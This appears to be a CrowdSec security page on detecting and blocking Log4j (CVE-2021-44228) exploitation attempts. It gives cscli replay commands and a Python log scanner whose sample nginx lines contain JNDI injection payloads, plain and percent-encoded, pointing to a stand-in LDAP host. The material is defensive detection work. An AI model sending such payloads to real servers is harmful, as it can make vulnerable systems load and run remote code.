This report includes real-time data reported by the CrowdSec Community. IPs originating from known public scanners are discarded from this report (mostly IPs from Germany) but are included in our full IP list available in this Gist.
Join the CrowdSec community and start reporting & remediating rogue IPs scanning for the Log4j vulnerabilities and many more. Get it here!
CrowdSec helps detect and mitigate Log4j exploits
The Log4j vulnerability impacts countless organizations. CrowdSec released a scenario that will help detect and block exploitation attempts of the vulnerability. This new scenario can be directly downloaded from our Hub and installed in a blink of an eye. Check this quick video to see the plugin in action:
As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.
Those IP addresses were curated by our consensus algorithm, meaning they received many reports against them from across our user network. The ones in the “not enough data” state are highly suspicious but may still contain some false positives; treat them at your own discretion. The ones categorized as “benign” are IPs used by parties that are usually on the right side of the fence; they probably scan to help rather than to undermine.
Alternatively, you can use our replay mode to analyze your servers’ logs and check whether exploitation of Log4j was attempted on your systems, by whom and when, using the appropriate scenario and the command lines below:
sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec
# sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type>
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx
sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228
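To illustrate what a replay over an nginx access log is looking for, here is an added Python example (not CrowdSec's scenario and not code from the page) that parses constructed "combined"-format log lines and flags requests carrying a JNDI lookup string, including the percent-encoded form nginx writes to the log, which a naive text search would miss. The log lines, IPs and hostnames are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample nginx access-log lines (not real traffic). Two carry the
# Log4j JNDI lookup string, one of them percent-encoded as nginx logs it in
# the request line; the first line is benign for comparison.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Dec/2021:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2021:10:12:05 +0000] "GET /?x=${jndi:ldap://example.invalid/a} HTTP/1.1" 200 612 "-" "curl/7.68.0"
203.0.113.11 - - [11/Dec/2021:10:12:09 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 153 "-" "-"
"""

# nginx "combined" format: client IP, timestamp, request line, status, size,
# referer, user agent. The last three are all client-controlled.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The JNDI lookup prefix is the signature of CVE-2021-44228 attempts;
# match case-insensitively after percent-decoding.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def decode(field: str) -> str:
    """Percent-decode until stable so double-encoded payloads are normalised too."""
    prev = None
    while prev != field:
        prev, field = field, unquote(field)
    return field


def find_log4j_attempts(log_text: str) -> list[dict]:
    """Return one record per line whose request, referer or user agent carries a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real replay would count parse failures
        for field in ("req", "ref", "ua"):
            if JNDI_RE.search(decode(m.group(field))):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "field": field})
                break
    return hits


if __name__ == "__main__":
    for hit in find_log4j_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} JNDI lookup in {hit['field']}")
```

The same decoding step matters for any other log source fed to replay mode, since the encoded and decoded forms of a request are logged differently by different servers.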